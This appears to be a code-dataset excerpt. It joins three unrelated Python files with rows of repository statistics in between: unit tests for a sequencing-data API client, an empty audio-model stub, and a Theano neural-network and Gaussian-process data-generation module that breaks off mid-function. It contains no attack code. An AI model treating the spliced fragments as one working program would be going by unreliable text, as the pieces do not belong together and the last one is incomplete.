"resources": [{
"identifier": "1",
"links": [
{
"rel": targ_key,
"href": targ_link
}
]
}]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
t_dict = {"key": "identifier", "value": "2"}
with self.assertRaises(KeyError) as err:
api.get_link(targ_URL, targ_key, targ_dict=t_dict)
self.assertTrue(t_dict["value"] + " not found." in str(err.exception))
api.session.get.assert_called_with(targ_URL)
@patch("API.apiCalls.ApiCalls.create_session")
@patch("API.apiCalls.ApiCalls.validate_URL_existence")
def test_get_link_invalid_targ_dict_key(self, mock_validate_url_existence,
mock_cs):
mock_validate_url_existence.side_effect = [True]
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
targ_URL = "http://localhost:8080/api/"
targ_key = "project"
targ_link = "http://localhost:8080/api/project"
json_obj = {
"resource": {
"resources": [
{
"identifier": "1",
"links": [
{
"rel": targ_key,
"href": targ_link
}
]
}
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
t_dict = {"key": "notIdentifier", "value": "1"}
with self.assertRaises(KeyError) as err:
api.get_link(targ_URL, targ_key, targ_dict=t_dict)
self.assertTrue(t_dict["key"] + " not found." in str(err.exception))
self.assertTrue("Available keys: identifier" in str(err.exception))
api.session.get.assert_called_with(targ_URL)
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_projects_valid(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
p1_dict = {
"identifier": "1",
"name": "project1",
"projectDescription": ""
}
p2_dict = {
"identifier": "2",
"name": "project2",
"projectDescription": "p2"
}
json_obj = {
"resource": {
"resources": [
p1_dict,
p2_dict
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
api.get_link = lambda x, y: None
proj_list = api.get_projects()
self.assertEqual(len(proj_list), 2)
self.assertEqual(proj_list[0].get_id(), p1_dict["identifier"])
self.assertEqual(proj_list[0].get_name(), p1_dict["name"])
self.assertEqual(proj_list[0].get_description(),
p1_dict["projectDescription"])
self.assertEqual(proj_list[1].get_id(), p2_dict["identifier"])
self.assertEqual(proj_list[1].get_name(), p2_dict["name"])
self.assertEqual(proj_list[1].get_description(),
p2_dict["projectDescription"])
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_projects_invalid_missing_key(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
p1_dict = {
"identifier": "1",
"projectDescription": ""
}
p2_dict = {
"identifier": "2",
"projectDescription": "p2"
}
json_obj = {
"resource": {
"resources": [
p1_dict,
p2_dict
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
api.get_link = lambda x, y: None
with self.assertRaises(KeyError) as err:
api.get_projects()
self.assertTrue("name not found" in str(err.exception))
self.assertTrue("Available keys: projectDescription, identifier"
in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_samples_valid(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
sample_dict = {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"identifier": "1"
}
json_obj = {
"resource": {
"resources": [
sample_dict
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
api.get_link = lambda x, y, targ_dict="": None
proj = API.apiCalls.Project("project1", "projectDescription", "1")
sample_list = api.get_samples(proj)
self.assertEqual(len(sample_list), 1)
self.assertEqual(sample_dict.items(),
sample_list[0].get_dict().items())
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_samples_invalid_proj_id(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
api.get_link = MagicMock(side_effect=[StopIteration])
proj = API.apiCalls.Project("project1", "projectDescription", "999")
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.get_samples(proj)
self.assertTrue(proj.get_id() + " doesn't exist"
in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_sequence_files_valid(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
seq_dict = {
"file": "/tmp/sequence-files/12/2/03-3333_S1_L001_R2_001.fastq",
"fileName": "03-3333_S1_L001_R2_001.fastq",
"identifier": "12",
"links": [{
"rel": "self",
"href": "http://localhost:8080/api/" +
"projects/4/samples/53/sequenceFiles/12"
}]
}
json_obj = {
"resource": {
"resources": [
seq_dict
]
}
}
session_response = Foo()
setattr(session_response, "json", lambda: json_obj)
session_get = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "get", session_get)
api.session = session
api.get_link = lambda x, y, targ_dict="": None
sample_dict = {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"sampleProject": "1"
}
sample = API.apiCalls.Sample(sample_dict)
seqRes = api.get_sequence_files(sample)
self.assertEqual(len(seqRes), 1)
self.assertEqual(seq_dict.items(), seqRes[0].items())
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_sequence_files_invalid_proj(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
api.get_link = MagicMock(side_effect=[StopIteration])
sample = API.apiCalls.Sample({"sampleProject": "999", "sampleName": "1"})
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.get_sequence_files(sample)
self.assertTrue(sample["sampleProject"] + " doesn't exist"
in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_get_sequence_files_invalid_sample(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
# proj_URL, sample_URL, url->sample/sequenceFiles
api.get_link = MagicMock(side_effect=[None, None, StopIteration])
sample_dict = {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"sampleProject": "999"
}
sample = API.apiCalls.Sample(sample_dict)
with self.assertRaises(API.apiCalls.SampleError) as err:
api.get_sequence_files(sample)
self.assertTrue(sample.get_id() + " doesn't exist"
in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_project_valid(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
json_dict = {
"resource": {
"name": "project1",
"projectDescription": "projectDescription",
"identifier": "1"
}
}
json_obj = json.dumps(json_dict)
session_response = Foo()
setattr(session_response, "status_code", httplib.CREATED)
setattr(session_response, "text", json_obj)
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.session = session
api.get_link = lambda x, y, targ_dict="": None
proj = API.apiCalls.Project("project1", "projectDescription", "1")
json_res = api.send_project(proj)
self.assertEqual(json_dict, json_res)
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_project_invalid_name(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
proj = API.apiCalls.Project("p", "projectDescription", "1")
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.send_project(proj)
self.assertTrue("Invalid project name: " + proj.get_name() in
str(err.exception))
self.assertTrue("A project requires a name that must be" +
" 5 or more characters" in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_project_invalid_server_res(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
session_response = Foo()
setattr(session_response, "status_code", httplib.INTERNAL_SERVER_ERROR)
setattr(session_response, "text", "Server unavailable")
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.session = session
api.get_link = lambda x, y, targ_dict="": None
proj = API.apiCalls.Project("project1", "projectDescription", "1")
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.send_project(proj)
self.assertTrue(str(session_response.status_code) + " " +
session_response.text in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_samples_valid(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
json_dict = {
"resource": {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"sampleProject": "1"
}
}
json_obj = json.dumps(json_dict)
session_response = Foo()
setattr(session_response, "status_code", httplib.CREATED)
setattr(session_response, "text", json_obj)
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.get_link = lambda x, y, targ_dict="": None
api.session = session
sample_dict = {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"sampleProject": "1"
}
sample = API.apiCalls.Sample(sample_dict)
json_res_list = api.send_samples([sample])
self.assertEqual(len(json_res_list), 1)
json_res = json_res_list[0]
self.assertEqual(json_res, json_dict)
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_samples_invalid_proj_id(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
api.get_link = MagicMock(side_effect=[StopIteration])
proj_id = "-1"
sample = API.apiCalls.Sample({"sampleProject": proj_id, "sampleName": "1"})
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.send_samples([sample])
self.assertTrue(proj_id + " doesn't exist"
in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_samples_invalid_sample_name(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
session_response = Foo()
setattr(session_response, "status_code", httplib.BAD_REQUEST)
setattr(session_response, "text", "\"sampleName\":[\"Sample name must be at least 3 characters long.\"]")
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.get_link = lambda x, y, targ_dict="": None
api.session = session
sample_dict = {
"sequencerSampleId": "33",
"description": "The 53rd sample",
"sampleName": "33",
"sampleProject": "1"
}
sample = API.apiCalls.Sample(sample_dict)
seq_file = SequenceFile({}, [])
sample.set_seq_file(seq_file)
sample.run = SequencingRun(sample_sheet="sheet", sample_list=[sample])
sample.run._sample_sheet_name = "sheet"
with self.assertRaises(API.apiCalls.SampleError) as err:
api.send_samples([sample])
self.assertTrue("Sample name must be at least 3 characters long." in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_samples_invalid_server_res(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
session_response = Foo()
setattr(session_response, "status_code", httplib.CONFLICT)
setattr(session_response, "text",
"An entity already exists with that identifier")
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.session = session
api.get_link = lambda x, y, targ_dict="": None
sample = API.apiCalls.Sample({"sampleProject": "1", "sampleName": "123"})
seq_file = SequenceFile({}, [])
sample.set_seq_file(seq_file)
sample.run = SequencingRun(sample_sheet="sheet", sample_list=[sample])
sample.run._sample_sheet_name = "sheet"
with self.assertRaises(API.apiCalls.SampleError) as err:
api.send_samples([sample])
self.assertTrue(str(session_response.status_code) + ": " +
session_response.text in str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
@patch("os.path.getsize")
def test_send_sequence_files_valid(self, getsize, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
json_dict = {
"resource": [
{
"file": "03-3333_S1_L001_R1_001.fastq.gz"
},
{
"file": "03-3333_S1_L001_R2_001.fastq.gz"
}
]
}
json_obj = json.dumps(json_dict)
session_response = Foo()
setattr(session_response, "status_code", httplib.CREATED)
setattr(session_response, "text", json_obj)
session_post = MagicMock(side_effect=[session_response])
session = Foo()
setattr(session, "post", session_post)
api.get_link = lambda x, y, targ_dict="": None
api.session = session
API.apiCalls.ApiCalls.get_file_size_list = MagicMock()
sample_dict = {
"sequencerSampleId": "03-3333",
"description": "The 53rd sample",
"sampleName": "03-3333",
"sampleProject": "1"
}
sample = API.apiCalls.Sample(sample_dict)
files = ["03-3333_S1_L001_R1_001.fastq.gz",
"03-3333_S1_L001_R2_001.fastq.gz"]
seq_file = SequenceFile({}, files)
sample.set_seq_file(seq_file)
sample.run = SequencingRun(sample_sheet="sheet", sample_list=[sample])
sample.run._sample_sheet_name = "sheet"
kwargs = {
"samples_list": [sample]
}
json_res_list = api.send_sequence_files(**kwargs)
self.assertEqual(len(json_res_list), 1)
json_res = json_res_list[0]
self.assertEqual(json_res, json_dict)
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_sequence_files_invalid_proj_id(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
api.get_link = MagicMock(side_effect=[StopIteration])
api.get_file_size_list = MagicMock()
proj_id = "-1"
sample = API.apiCalls.Sample({"sampleProject": proj_id, "sampleName": "sample"})
seq_file = SequenceFile({}, [])
sample.set_seq_file(seq_file)
sample.run = SequencingRun(sample_sheet="sheet", sample_list=[sample])
sample.run._sample_sheet_name = "sheet"
with self.assertRaises(API.apiCalls.ProjectError) as err:
api.send_sequence_files([sample])
self.assertIn("project ID: {proj_id} doesn't exist".format(
proj_id=proj_id), str(err.exception))
@patch("API.apiCalls.ApiCalls.create_session")
def test_send_sequence_files_invalid_sample_id(self, mock_cs):
mock_cs.side_effect = [None]
api = API.apiCalls.ApiCalls(
client_id="",
client_secret="",
base_URL="",
username="",
password=""
)
api.get_link = MagicMock(side_effect=[None, None, StopIteration])
api.get_file_size_list = MagicMock()
proj_id = "1"
sample_id = "-1"
sample = API.apiCalls.Sample({
"sampleProject": proj_id,
"sampleName": sample_id,
"sequencerSampleId": sample_id
})
seq_file = SequenceFile({}, [])
sample.set_seq_file(seq_file)
sample.run = SequencingRun(sample_sheet="sheet", sample_list=[sample])
sample.run._sample_sheet_name = "sheet"
with self.assertRaises(API.apiCalls.SampleError) as err:
api.send_sequence_files([sample])
self.assertIn("sample ID: {sample_id} doesn't exist".format(
sample_id=sample_id), str(err.exception))
| 31.455611 | 117 | 0.564966 | 3,900 | 37,558 | 5.143333 | 0.067949 | 0.064709 | 0.077671 | 0.057431 | 0.866943 | 0.83723 | 0.807019 | 0.799442 | 0.785184 | 0.773319 | 0 | 0.01378 | 0.323739 | 37,558 | 1,193 | 118 | 31.481978 | 0.775975 | 0.010171 | 0 | 0.688043 | 0 | 0 | 0.142234 | 0.060369 | 0 | 0 | 0 | 0 | 0.082609 | 0 | null | null | 0.033696 | 0.009783 | null | null | 0.002174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0beac76ec35051487fa2341a7e59e71adc770d7 | 20 | py | Python | models/audio_models.py | KeirHavel/autoencoder-file-sorter | c6ab14c485185892a806a316bfa799b97f62e1b1 | [
"MIT"
] | 4 | 2021-04-09T05:47:59.000Z | 2021-11-30T14:31:33.000Z | models/audio_models.py | LumenPallidium/neural-file-sorter | c6ab14c485185892a806a316bfa799b97f62e1b1 | [
"MIT"
] | 15 | 2021-02-14T08:06:13.000Z | 2021-02-18T07:01:30.000Z | models/audio_models.py | KeirHavel/neural-file-sorter | c6ab14c485185892a806a316bfa799b97f62e1b1 | [
"MIT"
] | 1 | 2022-03-15T06:55:08.000Z | 2022-03-15T06:55:08.000Z | import torch
##todo | 6.666667 | 12 | 0.75 | 3 | 20 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 3 | 13 | 6.666667 | 0.882353 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c0c6090cb2e706c82bf3008fec3c5ad8abd86e2e | 50,972 | py | Python | GaussianProcess/Extended_dimension/Gaussian_Process_Model.py | KelvinCPChiu/Theano | 57f6362084a16cee7d6a486aaa56d54e6e155513 | [
"MIT"
] | null | null | null | GaussianProcess/Extended_dimension/Gaussian_Process_Model.py | KelvinCPChiu/Theano | 57f6362084a16cee7d6a486aaa56d54e6e155513 | [
"MIT"
] | null | null | null | GaussianProcess/Extended_dimension/Gaussian_Process_Model.py | KelvinCPChiu/Theano | 57f6362084a16cee7d6a486aaa56d54e6e155513 | [
"MIT"
] | null | null | null | from __future__ import division
import numpy
import theano.tensor as T
import theano
from theano.tensor.signal import pool
from theano.tensor.nnet import conv2d
import six.moves.cPickle as pickle
import timeit
import scipy.io
import matplotlib.pyplot as plt
class LogisticRegression(object):
def __init__(self, input, n_in, n_out):
# start-snippet-1
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
# self.W = theano.shared(
# value=numpy.asarray(
# rng.uniform(
# low=-numpy.sqrt(6. / (n_in + n_out)),
# high=numpy.sqrt(6. / (n_in + n_out)),
# size=(n_in, n_out)), dtype=theano.config.floatX),
# name='W',
# borrow=True
# )
self.W = theano.shared(
value=numpy.zeros(
(n_in, n_out),
dtype=theano.config.floatX
),
name='W',
borrow=True
)
# initialize the biases b as a vector of n_out 0s
self.b = theano.shared(
value=numpy.zeros(
(n_out,),
dtype=theano.config.floatX
),
name='b',
borrow=True
)
self.output = T.nnet.sigmoid(T.dot(input, self.W) + self.b)
# parameters of the model
self.params = [self.W, self.b]
# keep track of model input
self.input = input
def negative_log_likelihood(self, y):
return -T.mean(y*T.log(self.output) + (1-y)*T.log(1-self.output))
def sigmoid_cost_function(self, y):
return T.mean(T.switch(T.eq(y, 1), -T.log(self.output), -T.log(1-self.output)))
def mse_cost_function(self, y):
return T.mean(T.square(y - self.output))
def errors(self, y):
if y.ndim != self.output.ndim:
raise TypeError(
'y should have the same shape as self.y_pred',
('y', y.type, 'y_pred', self.output.type)
)
# check if y is of the correct datatype
if y.dtype.startswith('float'):
return T.mean(T.square(y - self.output))
else:
raise NotImplementedError()
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out, W=None, b=None,
activation=T.nnet.relu):
"""
Typical hidden layer of a MLP: units are fully-connected and have
sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)
and the bias vector b is of shape (n_out,).
NOTE : The nonlinearity used here is tanh
Hidden unit activation is given by: tanh(dot(input,W) + b)
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dmatrix
:param input: a symbolic tensor of shape (n_examples, n_in)
:type n_in: int
:param n_in: dimensionality of input
:type n_out: int
:param n_out: number of hidden units
:type activation: theano.Op or function
:param activation: Non linearity to be applied in the hidden
layer
"""
self.input = input
# end-snippet-1
# `W` is initialized with `W_values` which is uniformely sampled
# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))
# for tanh activation function
# the output of uniform if converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
# Note : optimal initialization of weights is dependent on the
# activation function used (among other things).
# For example, results presented in [Xavier10] suggest that you
# should use 4 times larger initial weights for sigmoid
# compared to tanh
# We have no info for other function, so we use the same as
# tanh.
if W is None:
W_values = numpy.asarray(
rng.uniform(
low=-numpy.sqrt(6 / (n_in + n_out)),
high=numpy.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)
),
dtype=theano.config.floatX
)
if activation == theano.tensor.nnet.sigmoid:
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = numpy.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (
lin_output if activation is None
else activation(lin_output)
)
# parameters of the model
self.params = [self.W, self.b]
class LeNetConvPoolLayer(object):
"""Pool Layer of a convolutional network """
def __init__(self, rng, input, filter_shape, image_shape, poolsize=(2, 2)):
"""
Allocate a LeNetConvPoolLayer with shared variable internal parameters.
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dtensor4
:param input: symbolic image tensor, of shape image_shape
:type filter_shape: tuple or list of length 4
:param filter_shape: (number of filters, num input feature maps,
filter height, filter width)
:type image_shape: tuple or list of length 4
:param image_shape: (batch size, num input feature maps,
image height, image width)
:type poolsize: tuple or list of length 2
:param poolsize: the downsampling (pooling) factor (#rows, #cols)
"""
assert image_shape[1] == filter_shape[1]
self.input = input
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = numpy.prod(filter_shape[1:])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = (filter_shape[0] * numpy.prod(filter_shape[2:]) //
numpy.prod(poolsize))
# initialize weights with random weights
W_bound = numpy.sqrt(6. / (fan_in + fan_out))
self.W = theano.shared(
numpy.asarray(
rng.uniform(low=-W_bound, high=W_bound, size=filter_shape),
dtype=theano.config.floatX
),
borrow=True
)
# the bias is a 1D tensor -- one bias per output feature map
b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)
self.b = theano.shared(value=b_values, borrow=True)
# convolve input feature maps with filters
conv_out = conv2d(
input=input,
filters=self.W,
filter_shape=filter_shape,
input_shape=image_shape
)
# pool each feature map individually, using maxpooling
pooled_out = pool.pool_2d(
input=conv_out,
ws=poolsize,
ignore_border=True
)
# add the bias term. Since the bias is a vector (1D array), we first
# reshape it to a tensor of shape (1, n_filters, 1, 1). Each bias will
# thus be broadcasted across mini-batches and feature map
# width & height
self.output = T.nnet.relu(pooled_out + self.b.dimshuffle('x', 0, 'x', 'x'))
# store parameters of this layer
self.params = [self.W, self.b]
# keep track of model input
self.input = input
class ConvPoolLayer_NoMaxPool(object):
"""Pool Layer of a convolutional network """
def __init__(self, rng, input, filter_shape, image_shape):
"""
Allocate a LeNetConvPoolLayer with shared variable internal parameters.
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dtensor4
:param input: symbolic image tensor, of shape image_shape
:type filter_shape: tuple or list of length 4
:param filter_shape: (number of filters, num input feature maps,
filter height, filter width)
:type image_shape: tuple or list of length 4
:param image_shape: (batch size, num input feature maps,
image height, image width)
:type poolsize: tuple or list of length 2
:param poolsize: the downsampling (pooling) factor (#rows, #cols)
"""
assert image_shape[1] == filter_shape[1]
self.input = input
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = numpy.prod(filter_shape[1:])
# Filter_shape[1] is the input kernel number
# Filter_shape[0] is the output kernel number
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = filter_shape[0] * numpy.prod(filter_shape[2:])
# initialize weights with random weights
W_bound = numpy.sqrt(6. / (fan_in + fan_out))
self.W = theano.shared(
numpy.asarray(
rng.uniform(low=-W_bound, high=W_bound, size=filter_shape),
dtype=theano.config.floatX
),
borrow=True
)
# the bias is a 1D tensor -- one bias per output feature map
b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)
self.b = theano.shared(value=b_values, borrow=True)
# convolve input feature maps with filters
conv_out = conv2d(
input=input,
filters=self.W,
filter_shape=filter_shape,
input_shape=image_shape
)
# add the bias term. Since the bias is a vector (1D array), we first
# reshape it to a tensor of shape (1, n_filters, 1, 1). Each bias will
# thus be broadcasted across mini-batches and feature map
# width & height
self.output = T.nnet.relu(conv_out + self.b.dimshuffle('x', 0, 'x', 'x'))
# store parameters of this layer
self.params = [self.W, self.b]
# keep track of model input
self.input = input
def printimage(test_set_x):
# Print Image from tensor to numpy and plot it
#mm = numpy.squeeze(test_set_x.eval(), axis=(0,))
# print(mm)
mm = test_set_x
fig = plt.figure()
plotwindow = fig.add_subplot(111)
plt.imshow(mm) # , cmap='gray')
plt.axis('off')
fig.savefig('figure1.png', bbox_inches='tight', pad_inches=0)
plt.show()
return
def Generate_Set(raw_image_set, size_desired):
def one_hot(imput_class, number_of_class):
imput_class = numpy.array(imput_class)
assert imput_class.ndim == 1
return numpy.eye(number_of_class)[imput_class]
def shared_dataset(data_x, data_y, borrow=True):
shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def interpolation(input_image_1, input_image_2):
morphing_coeff = numpy.random.random(input_image_1.shape[0])
resultant_set = morphing_coeff[:, None, None] * input_image_1+(1-morphing_coeff)[:, None, None]*input_image_2
return resultant_set, morphing_coeff
def Cropping(input_image, set_size):
# x_dim = input_image.shape[2]
# y_dim = input_image.shape[1]
x_dim_max = input_image.shape[2] - 28
y_dim_max = input_image.shape[1] - 28
cropping_x_dim = numpy.random.random_integers(0, x_dim_max, set_size)
cropping_y_dim = numpy.random.random_integers(0, y_dim_max, set_size)
image_label = numpy.random.random_integers(0, 9, set_size)
output_image = numpy.zeros((set_size, 28, 28))
for i in range(0, set_size, 1):
output_image[i, :, :] = input_image[image_label[i],
cropping_x_dim[i]:cropping_x_dim[i]+28,
cropping_y_dim[i]:cropping_y_dim[i]+28]
return output_image, image_label
temp_image_1, temp_label_1 = Cropping(raw_image_set, size_desired)
temp_image_2, temp_label_2 = Cropping(raw_image_set, size_desired)
generated_image_set, morphing_constant = interpolation(temp_image_1, temp_image_2)
number_of_classes = 10
set_order1 = one_hot(temp_label_1, number_of_classes)
set_order2 = one_hot(temp_label_2, number_of_classes)
generated_label_set = set_order1*morphing_constant[:, None] + set_order2*((1-morphing_constant)[:, None])
return shared_dataset(generated_image_set, generated_label_set)
def Generate_Set_ez(raw_image_set, size_desired):
# For binary label Generation of GPD
def one_hot(imput_class, number_of_class):
imput_class = numpy.array(imput_class)
assert imput_class.ndim == 1
return numpy.eye(number_of_class)[imput_class]
def shared_dataset(data_x, data_y, borrow=True):
shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def interpolation(input_image_1, input_image_2):
morphing_coeff = numpy.random.random(input_image_1.shape[0])
resultant_set = morphing_coeff[:, None, None] * input_image_1 + (1-morphing_coeff)[:, None, None]*input_image_2
return resultant_set, morphing_coeff
def Cropping(input_image, set_size):
# x_dim = input_image.shape[2]
# y_dim = input_image.shape[1]
x_dim_max = input_image.shape[2] - 28
y_dim_max = input_image.shape[1] - 28
cropping_x_dim = numpy.random.random_integers(0, x_dim_max, set_size)
cropping_y_dim = numpy.random.random_integers(0, y_dim_max, set_size)
image_label = numpy.random.random_integers(0, 9, set_size)
output_image = numpy.zeros((set_size, 28, 28))
for i in range(0, set_size, 1):
output_image[i, :, :] = input_image[image_label[i],
cropping_x_dim[i]:cropping_x_dim[i]+28,
cropping_y_dim[i]:cropping_y_dim[i]+28]
return output_image, image_label
temp_image_1, temp_label_1 = Cropping(raw_image_set, size_desired)
temp_image_2, temp_label_2 = Cropping(raw_image_set, size_desired)
generated_image_set, morphing_constant = interpolation(temp_image_1, temp_image_2)
number_of_classes = 10
set_order1 = one_hot(temp_label_1, number_of_classes)
set_order2 = one_hot(temp_label_2, number_of_classes)
generated_label_set = set_order1 + set_order2
generated_label_set = generated_label_set - (generated_label_set == 2)*generated_label_set/2
#generated_label_set = set_order1*morphing_constant[:, None] + set_order2*((1-morphing_constant)[:, None])
return shared_dataset(generated_image_set, generated_label_set)
def Generate_Set_ez_fixed_seq(raw_image_set, size_desired, seq1, seq2):
def one_hot(imput_class, number_of_class):
imput_class = numpy.array(imput_class)
assert imput_class.ndim == 1
return numpy.eye(number_of_class)[imput_class]
def shared_dataset(data_x, data_y, borrow=True):
shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def interpolation(input_image_1, input_image_2):
morphing_coeff = numpy.random.random(input_image_1.shape[0])
resultant_set = morphing_coeff[:, None, None] * input_image_1+(1-morphing_coeff)[:, None, None]*input_image_2
return resultant_set, morphing_coeff
def Cropping(input_image, set_size, random_sequence, name):
x_dim_max = input_image.shape[2] - 28
y_dim_max = input_image.shape[1] - 28
if random_sequence is None:
cropping_x_dim = numpy.random.random_integers(0, x_dim_max, set_size)
cropping_y_dim = numpy.random.random_integers(0, y_dim_max, set_size)
